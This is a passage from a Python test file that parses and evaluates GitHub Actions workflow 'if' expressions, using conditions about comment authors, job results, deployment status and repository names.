        "github.event.comment.body": "[test] testing",
        "github.event.comment.author_association": "NONE",
    }

    evaluator = ExpressionEvaluator(variables)
    result = evaluator.evaluate(expr.get_node())

    print(f"Result of the expression '{if_check}' is: {result}")

    assert result is False


def test_parse3():
    if_check = "${{ endsWith(inputs.repository-name, '-enterprise') }}"
    expr = ExpressionParser(if_check)
    expr.print_ast()


def test_parse4():
    if_check = "always() && (needs.get-go-version.result == 'failure' || needs.acceptance-test.result == 'failure')"
    expr = ExpressionParser(if_check)
    expr.print_ast()


def test_parse5():
    if_check = "github.event.deployment_status.state == 'success' && github.event.deployment.environment == 'preview' && github.event.sender.id == 35613825 && github.event.repository.name == 'dev-portal'"
    expr = ExpressionParser(if_check)
    expr.print_ast()
    evaluator = ExpressionEvaluator()


def test_simple_evaluate():
    # Example usage:
    variables = {"github.event.issue.pull_request": True}
    expression = "github.event.issue.pull_request"
    parser = ExpressionParser(expression)
    ast_root = parser.get_node()

    evaluator = ExpressionEvaluator(variables)
    result = evaluator.evaluate(ast_root)
    print(f"Result of the expression '{expression}' is: {result}")
    assert result is True
